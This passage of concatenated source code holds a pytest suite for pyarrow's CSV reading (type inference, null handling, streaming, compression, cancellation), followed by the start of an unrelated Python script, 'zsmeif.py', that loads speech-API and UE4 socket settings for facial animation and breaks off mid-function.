('d', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, 4.0],
'b': [2, -5],
'c': ["3", "foo"],
'd': [False, True],
}
def test_simple_nulls(self):
# Infer various kinds of data, with nulls
rows = (b"a,b,c,d,e,f\n"
b"1,2,,,3,N/A\n"
b"nan,-5,foo,,nan,TRUE\n"
b"4.5,#N/A,nan,,\xff,false\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
('d', pa.null()),
('e', pa.binary()),
('f', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, None, 4.5],
'b': [2, -5, None],
'c': ["", "foo", "nan"],
'd': [None, None, None],
'e': [b"3", b"nan", b"\xff"],
'f': [None, True, False],
}
def test_simple_timestamps(self):
# Infer a timestamp column
rows = (b"a,b,c\n"
b"1970,1970-01-01 00:00:00,1970-01-01 00:00:00.123\n"
b"1989,1989-07-14 01:00:00,1989-07-14 01:00:00.123456\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.timestamp('s')),
('c', pa.timestamp('ns'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1970, 1989],
'b': [datetime(1970, 1, 1), datetime(1989, 7, 14, 1)],
'c': [datetime(1970, 1, 1, 0, 0, 0, 123000),
datetime(1989, 7, 14, 1, 0, 0, 123456)],
}
def test_timestamp_parsers(self):
# Infer timestamps with custom parsers
rows = b"a,b\n1970/01/01,1980-01-01 00\n1970/01/02,1980-01-02 00\n"
opts = ConvertOptions()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': ['1970/01/01', '1970/01/02'],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
opts.timestamp_parsers = ['%Y/%m/%d']
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': ['1980-01-01 00', '1980-01-02 00'],
}
opts.timestamp_parsers = ['%Y/%m/%d', ISO8601]
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
def test_dates(self):
# Dates are inferred as date32 by default
rows = b"a,b\n1970-01-01,1970-01-02\n1971-01-01,1971-01-02\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.date32()),
('b', pa.date32())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for date types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.date32(), 'b': pa.date64()}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.date32()),
('b', pa.date64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for timestamp types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.timestamp('s'), 'b': pa.timestamp('ms')}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('ms'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1971, 1, 1)],
'b': [datetime(1970, 1, 2), datetime(1971, 1, 2)],
}
def test_auto_dict_encode(self):
opts = ConvertOptions(auto_dict_encode=True)
rows = "a,b\nab,1\ncdé,2\ncdé,3\nab,4".encode()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.string())),
('b', pa.int64())])
expected = {
'a': ["ab", "cdé", "cdé", "ab"],
'b': [1, 2, 3, 4],
}
assert table.schema == schema
assert table.to_pydict() == expected
opts.auto_dict_max_cardinality = 2
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# Cardinality above max => plain-encoded
opts.auto_dict_max_cardinality = 1
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == pa.schema([('a', pa.string()),
('b', pa.int64())])
assert table.to_pydict() == expected
# With invalid UTF8, not checked
opts.auto_dict_max_cardinality = 50
opts.check_utf8 = False
rows = b"a,b\nab,1\ncd\xff,2\nab,3"
table = self.read_bytes(rows, convert_options=opts,
validate_full=False)
assert table.schema == schema
dict_values = table['a'].chunk(0).dictionary
assert len(dict_values) == 2
assert dict_values[0].as_py() == "ab"
assert dict_values[1].as_buffer() == b"cd\xff"
# With invalid UTF8, checked
opts.check_utf8 = True
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.binary())),
('b', pa.int64())])
expected = {
'a': [b"ab", b"cd\xff", b"ab"],
'b': [1, 2, 3],
}
assert table.schema == schema
assert table.to_pydict() == expected
def test_custom_nulls(self):
# Infer nulls with custom values
opts = ConvertOptions(null_values=['Xxx', 'Zzz'])
rows = b"a,b,c,d\nZzz,Xxx,1,2\nXxx,#N/A,,Zzz\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.null()),
('b', pa.string()),
('c', pa.string()),
('d', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [None, None],
'b': ["Xxx", "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=['Xxx', 'Zzz'],
strings_can_be_null=True)
table = self.read_bytes(rows, convert_options=opts)
assert table.to_pydict() == {
'a': [None, None],
'b': [None, "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=[])
rows = b"a,b\n#N/A,\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["#N/A"],
'b': [""],
}
def test_custom_bools(self):
# Infer booleans with custom values
opts = ConvertOptions(true_values=['T', 'yes'],
false_values=['F', 'no'])
rows = (b"a,b,c\n"
b"True,T,t\n"
b"False,F,f\n"
b"True,yes,yes\n"
b"False,no,no\n"
b"N/A,N/A,N/A\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.bool_()),
('c', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["True", "False", "True", "False", "N/A"],
'b': [True, False, True, False, None],
'c': ["t", "f", "yes", "no", "N/A"],
}
def test_column_types(self):
# Ask for specific column types in ConvertOptions
opts = ConvertOptions(column_types={'b': 'float32',
'c': 'string',
'd': 'boolean',
'e': pa.decimal128(11, 2),
'zz': 'null'})
rows = b"a,b,c,d,e\n1,2,3,true,1.0\n4,-5,6,false,0\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.int64()),
('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2))])
expected = {
'a': [1, 4],
'b': [2.0, -5.0],
'c': ["3", "6"],
'd': [True, False],
'e': [Decimal("1.00"), Decimal("0.00")]
}
assert table.schema == schema
assert table.to_pydict() == expected
# Pass column_types as schema
opts = ConvertOptions(
column_types=pa.schema([('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2)),
('zz', pa.bool_())]))
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# One of the columns in column_types fails converting
rows = b"a,b,c,d,e\n1,XXX,3,true,5\n4,-5,6,false,7\n"
with pytest.raises(pa.ArrowInvalid) as exc:
self.read_bytes(rows, convert_options=opts)
err = str(exc.value)
assert "In CSV column #1: " in err
assert "CSV conversion error to float: invalid value 'XXX'" in err
def test_column_types_dict(self):
# Ask for dict-encoded column types in ConvertOptions
column_types = [
('a', pa.dictionary(pa.int32(), pa.utf8())),
('b', pa.dictionary(pa.int32(), pa.int64())),
('c', pa.dictionary(pa.int32(), pa.decimal128(11, 2))),
('d', pa.dictionary(pa.int32(), pa.large_utf8()))]
opts = ConvertOptions(column_types=dict(column_types))
rows = (b"a,b,c,d\n"
b"abc,123456,1.0,zz\n"
b"defg,123456,0.5,xx\n"
b"abc,N/A,1.0,xx\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema(column_types)
expected = {
'a': ["abc", "defg", "abc"],
'b': [123456, 123456, None],
'c': [Decimal("1.00"), Decimal("0.50"), Decimal("1.00")],
'd': ["zz", "xx", "xx"],
}
assert table.schema == schema
assert table.to_pydict() == expected
# Unsupported index type
column_types[0] = ('a', pa.dictionary(pa.int8(), pa.utf8()))
opts = ConvertOptions(column_types=dict(column_types))
with pytest.raises(NotImplementedError):
table = self.read_bytes(rows, convert_options=opts)
def test_column_types_with_column_names(self):
# When both `column_names` and `column_types` are given, names
# in `column_types` should refer to names in `column_names`
rows = b"a,b\nc,d\ne,f\n"
read_options = ReadOptions(column_names=['x', 'y'])
convert_options = ConvertOptions(column_types={'x': pa.binary()})
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('x', pa.binary()),
('y', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'x': [b'a', b'c', b'e'],
'y': ['b', 'd', 'f'],
}
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_trivial(self):
# A bit pointless, but at least it shouldn't crash
rows = b",\n\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {'': []}
def test_empty_lines(self):
rows = b"a,b\n\r1,2\r\n\r\n3,4\r\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 3],
'b': [2, 4],
}
parse_options = ParseOptions(ignore_empty_lines=False)
table = self.read_bytes(rows, parse_options=parse_options)
assert table.to_pydict() == {
'a': [None, 1, None, 3],
'b': [None, 2, None, 4],
}
read_options = ReadOptions(skip_rows=2)
table = self.read_bytes(rows, parse_options=parse_options,
read_options=read_options)
assert table.to_pydict() == {
'1': [None, 3],
'2': [None, 4],
}
def test_invalid_csv(self):
# Various CSV errors
rows = b"a,b,c\n1,2\n4,5,6\n"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 2"):
self.read_bytes(rows)
rows = b"a,b,c\n1,2,3\n4"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 1"):
self.read_bytes(rows)
for rows in [b"", b"\n", b"\r\n", b"\r", b"\n\n"]:
with pytest.raises(pa.ArrowInvalid, match="Empty CSV file"):
self.read_bytes(rows)
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a;b': ['de'],
'c': ['fg;eh'],
}
opts = ParseOptions(delimiter=';')
table = self.read_bytes(rows, parse_options=opts)
assert table.to_pydict() == {
'a': ['de,fg'],
'b,c': ['eh'],
}
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
table = self.read_bytes(csv)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [11, 12, 13, 17, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
read_options = ReadOptions(block_size=block_size)
table = self.read_bytes(csv, read_options=read_options)
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
def test_stress_convert_options_blowup(self):
# ARROW-6481: A convert_options with a very large number of columns
# should not blow memory and CPU time.
try:
clock = time.thread_time
except AttributeError:
clock = time.time
num_columns = 10000
col_names = ["K{}".format(i) for i in range(num_columns)]
csv = make_empty_csv(col_names)
t1 = clock()
convert_options = ConvertOptions(
column_types={k: pa.string() for k in col_names[::2]})
table = self.read_bytes(csv, convert_options=convert_options)
dt = clock() - t1
# Check that processing time didn't blow up.
# This is a conservative check (it takes less than 300 ms
# in debug mode on my local machine).
assert dt <= 10.0
# Check result
assert table.num_columns == num_columns
assert table.num_rows == 0
assert table.column_names == col_names
def test_cancellation(self):
if (threading.current_thread().ident !=
threading.main_thread().ident):
pytest.skip("test only works from main Python thread")
if sys.version_info >= (3, 8):
raise_signal = signal.raise_signal
elif os.name == 'nt':
# On Windows, os.kill() doesn't actually send a signal,
# it just terminates the process with the given exit code.
pytest.skip("test requires Python 3.8+ on Windows")
else:
# On Unix, emulate raise_signal() with os.kill().
def raise_signal(signum):
os.kill(os.getpid(), signum)
# Make the interruptible workload large enough to not finish
# before the interrupt comes, even in release mode on fast machines
large_csv = b"a,b,c\n" + b"1,2,3\n" * 200_000_000
def signal_from_thread():
time.sleep(0.2)
raise_signal(signal.SIGINT)
t1 = time.time()
try:
try:
t = threading.Thread(target=signal_from_thread)
with pytest.raises(KeyboardInterrupt) as exc_info:
t.start()
self.read_bytes(large_csv)
finally:
t.join()
except KeyboardInterrupt:
# In case KeyboardInterrupt didn't interrupt `self.read_bytes`
# above, at least prevent it from stopping the test suite
self.fail("KeyboardInterrupt didn't interrupt CSV reading")
dt = time.time() - t1
assert dt <= 1.0
e = exc_info.value.__context__
assert isinstance(e, pa.ArrowCancelled)
assert e.signum == signal.SIGINT
def test_cancellation_disabled(self):
# ARROW-12622: reader would segfault when the cancelling signal
# handler was not enabled (e.g. if disabled, or if not on the
# main thread)
t = threading.Thread(target=lambda: self.read_bytes(b"f64\n0.1"))
t.start()
t.join()
class TestSerialCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
class TestParallelCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = True
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
class BaseTestStreamingCSVRead:
def open_bytes(self, b, **kwargs):
return self.open_csv(pa.py_buffer(b), **kwargs)
def check_reader(self, reader, expected_schema, expected_data):
assert reader.schema == expected_schema
batches = list(reader)
assert len(batches) == len(expected_data)
for batch, expected_batch in zip(batches, expected_data):
batch.validate(full=True)
assert batch.schema == expected_schema
assert batch.to_pydict() == expected_batch
def test_file_object(self):
data = b"a,b\n1,2\n3,4\n"
expected_data = {'a': [1, 3], 'b': [2, 4]}
bio = io.BytesIO(data)
reader = self.open_csv(bio)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
self.check_reader(reader, expected_schema, [expected_data])
def test_header(self):
rows = b"abc,def,gh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('abc', pa.null()),
('def', pa.null()),
('gh', pa.null())])
self.check_reader(reader, expected_schema, [])
def test_inference(self):
# Inference is done on first block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
read_options = ReadOptions()
read_options.block_size = len(rows)
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc', 'gh'],
'b': [b'456', b'de\xff', b'ij']}])
read_options.block_size = len(rows) - 1
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc'],
'b': [b'456', b'de\xff']},
{'a': ['gh'],
'b': [b'ij']}])
def test_inference_failure(self):
# Inference on first block, then conversion failure on second block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
read_options = ReadOptions()
read_options.block_size = len(rows) - 7
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {
'a': [123], 'b': [456]
}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
# Inference on first block, then conversion failure on second block,
# then success on third block
rows = b"a,b\n1,2\nabc,def\n45,67\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# Third block
assert reader.read_next_batch().to_pydict() == {'a': [45], 'b': [67]}
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_invalid_csv(self):
# CSV errors on first block
rows = b"a,b\n1,2,3\n4,5\n6,7\n"
read_options = ReadOptions()
read_options.block_size = 10
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader = self.open_bytes(rows, read_options=read_options)
# CSV errors on second block
rows = b"a,b\n1,2\n3,4,5\n6,7\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader.read_next_batch()
# Cannot continue after a parse error
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a;b', pa.string()),
('c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a;b': ['de'],
'c': ['fg;eh']}])
opts = ParseOptions(delimiter=';')
reader = self.open_bytes(rows, parse_options=opts)
expected_schema = pa.schema([('a', pa.string()),
('b,c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ['de,fg'],
'b,c': ['eh']}])
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
self.check_reader(reader, expected_schema,
[{'a': [1, 4],
'b': [2, 5],
'c': [3, 6]}])
def test_empty_file(self):
with pytest.raises(ValueError, match="Empty CSV file"):
self.open_bytes(b"")
def test_column_options(self):
# With column_names
rows = b"1,2,3\n4,5,6"
read_options = ReadOptions()
read_options.column_names = ['d', 'e', 'f']
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('d', pa.int64()),
('e', pa.int64()),
('f', pa.int64())])
self.check_reader(reader, expected_schema,
[{'d': [1, 4],
'e': [2, 5],
'f': [3, 6]}])
# With include_columns
convert_options = ConvertOptions()
convert_options.include_columns = ['f', 'e']
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.int64())])
self.check_reader(reader, expected_schema,
[{'e': [2, 5],
'f': [3, 6]}])
# With column_types
convert_options.column_types = {'e': pa.string()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'e': ["2", "5"],
'f': [3, 6]}])
# Missing columns in include_columns
convert_options.include_columns = ['g', 'f', 'e']
with pytest.raises(
KeyError,
match="Column 'g' in include_columns does not exist"):
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
convert_options.include_missing_columns = True
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.null()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
convert_options.column_types = {'e': pa.string(), 'g': pa.float64()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.float64()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
def test_encoding(self):
# latin-1 (invalid utf-8)
rows = b"a,b\nun,\xe9l\xe9phant"
read_options = ReadOptions()
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': [b"\xe9l\xe9phant"]}])
read_options.encoding = 'latin1'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
# utf-16
rows = (b'\xff\xfea\x00,\x00b\x00\n\x00u\x00n\x00,'
b'\x00\xe9\x00l\x00\xe9\x00p\x00h\x00a\x00n\x00t\x00')
read_options.encoding = 'utf16'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
reader = self.open_bytes(csv)
table = reader.read_all()
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [19, 21, 23, 26, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
# Need at least two lines for type inference
assert csv[:block_size].count(b'\n') >= 2
read_options = ReadOptions(block_size=block_size)
reader = self.open_bytes(csv, read_options=read_options)
table = reader.read_all()
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
class TestSerialStreamingCSVRead(BaseTestStreamingCSVRead, unittest.TestCase):
def open_csv(self, *args, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
return open_csv(*args, **kwargs)
def test_batch_lifetime(self):
gc.collect()
old_allocated = pa.total_allocated_bytes()
# Memory occupation should not grow with CSV file size
def check_one_batch(reader, expected):
batch = reader.read_next_batch()
assert batch.to_pydict() == expected
rows = b"10,11\n12,13\n14,15\n16,17\n"
read_options = ReadOptions()
read_options.column_names = ['a', 'b']
read_options.block_size = 6
reader = self.open_bytes(rows, read_options=read_options)
check_one_batch(reader, {'a': [10], 'b': [11]})
allocated_after_first_batch = pa.total_allocated_bytes()
check_one_batch(reader, {'a': [12], 'b': [13]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [14], 'b': [15]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [16], 'b': [17]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
with pytest.raises(StopIteration):
reader.read_next_batch()
assert pa.total_allocated_bytes() == old_allocated
reader = None
assert pa.total_allocated_bytes() == old_allocated
class BaseTestCompressedCSVRead:
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix='arrow-csv-test-')
def tearDown(self):
shutil.rmtree(self.tmpdir)
def read_csv(self, csv_path):
try:
return read_csv(csv_path)
except pa.ArrowNotImplementedError as e:
pytest.skip(str(e))
def test_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=100)
csv_path = os.path.join(self.tmpdir, self.csv_filename)
self.write_file(csv_path, csv)
table = self.read_csv(csv_path)
table.validate(full=True)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
class TestGZipCSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.gz"
def write_file(self, path, contents):
with gzip.open(path, 'wb', 3) as f:
f.write(contents)
def test_concatenated(self):
# ARROW-5974
csv_path = os.path.join(self.tmpdir, self.csv_filename)
with gzip.open(csv_path, 'wb', 3) as f:
f.write(b"ab,cd\nef,gh\n")
with gzip.open(csv_path, 'ab', 3) as f:
f.write(b"ij,kl\nmn,op\n")
table = self.read_csv(csv_path)
assert table.to_pydict() == {
'ab': ['ef', 'ij', 'mn'],
'cd': ['gh', 'kl', 'op'],
}
class TestBZ2CSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.bz2"
def write_file(self, path, contents):
with bz2.BZ2File(path, 'w') as f:
f.write(contents)
def test_read_csv_does_not_close_passed_file_handles():
# ARROW-4823
buf = io.BytesIO(b"a,b,c\n1,2,3\n4,5,6")
read_csv(buf)
assert not buf.closed
def test_write_read_round_trip():
t = pa.Table.from_arrays([[1, 2, 3], ["a", "b", "c"]], ["c1", "c2"])
record_batch = t.to_batches(max_chunksize=4)[0]
for data in [t, record_batch]:
# Test with header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=True))
buf.seek(0)
assert t == read_csv(buf)
# Test without header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=False))
buf.seek(0)
read_options = ReadOptions(column_names=t.column_names)
assert t == read_csv(buf, read_options=read_options)
|
zsmeif.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
AiSpeech/main.py
~~~~~
:copyright:facegood © 2019 by the tang.
"""
import os
import sys
import time
from os.path import abspath, dirname, join
import codecs
import json
# *******************************************
# *******************************************
package_path = "./"
# speakers = ["zsmeif", "lchuam"]
# *******************************************
path_aispeech_config = join(package_path,"zsmeif_aispeech_config.json")
try:
with codecs.open(path_aispeech_config, 'r', 'utf-8-sig') as fconfig:
AiSpeechConfig = json.load(fconfig)
except Exception as err:
print("Read file failed,",path_aispeech_config,".Error is :",err)
os.system("pause")
exit(1)
# *******************************************
productId = AiSpeechConfig['api_key']['productId']
publicKey = AiSpeechConfig['api_key']['publicKey']
secretkey = AiSpeechConfig['api_key']['secretKey']
productIdChat = AiSpeechConfig['api_key']['productIdChat']
SPEAKER = AiSpeechConfig['api_key']['speaker']
BA_URL = AiSpeechConfig['api_ba']['url']
WSURL = AiSpeechConfig['api_websocket']['url']+productId + "&token="
request_body_json=json.dumps(AiSpeechConfig['api_websocket']['request_body_first'])
info_print = AiSpeechConfig['config']['print']
ID_SESSION = AiSpeechConfig['config']['session']
FPS = AiSpeechConfig['config']['fps']
SPEED_PLAY = float(1.0 / FPS)
# *******************************************
# *******************************************
import lib.socket.ue4_socket as ue4
ADDR_BIND = (AiSpeechConfig['config']['server']['ip'],AiSpeechConfig['config']['server']['port'])
ADDR_SEND = (AiSpeechConfig['config']['client']['ip'],AiSpeechConfig['config']['client']['port'])
ue4.BUFF_SIZE = AiSpeechConfig['config']['ue4']['recv_size']
ue4.RECORDING = False
ue4.RECORDING_BEGIN = AiSpeechConfig['config']['ue4']['begin'].encode('utf-8')
ue4.RECORDING_END = AiSpeechConfig['config']['ue4']['end'].encode('utf-8')
# *******************************************
# *******************************************
# useless bs weight indices
const_bs_index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 16, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 34, 35, 36, 37, 39, 46, 47, 48, 49, 50, 55, 56, 61, 62, 65, 70, 71, 72, 73, 83, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115]
# useful bs weight indices
var_bs_index = [10, 13, 14, 15, 18, 33, 38, 40, 41, 42, 43, 44, 45, 51, 52, 53, 54, 57, 58, 59, 60, 63, 64, 66, 67, 68, 69, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84]
# default useless weight value
const_bs_value = [0.,0.,-0.,0.,-0.,0.,-0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,-0.,-0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,-0.,0.,-0.,0.,-0.,0.,-0.,0.,0.,-0.,0.,-0.,0.,-0.,0.,-0.,0.,-0.,0.]
# the sort of bs name correspond to UE input sort
bs_name_index = [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 94, 93, 95, 96, 97, 98, 99, 100, 101, 102, 103, 105, 104, 106, 107, 108, 109, 110, 111, 112, 113, 114, 1, 115]
BS_CONUNT = 116
pbfile_path = join(package_path, 'zsmeif.pb')
CPU_Thread = AiSpeechConfig['config']['tensorflow']['cpu']
CPU_Frames = AiSpeechConfig['config']['tensorflow']['frames']
# *******************************************
# *******************************************
import numpy as np
from lib.audio.api_audio import AudioRecognition, AudioPlay
from lib.tensorflow.input_wavdata_output_lpc import c_lpc, get_audio_frames
from lib.tensorflow.input_lpc_output_weight import WeightsAnimation
pb_weights_animation = WeightsAnimation(pbfile_path)
get_weight = pb_weights_animation.get_weight
# *******************************************
def worker(q_input, q_output, i):
print("the cpus number is:", i)
while True:
input_data = q_input.get()
for output_wav in input_data:
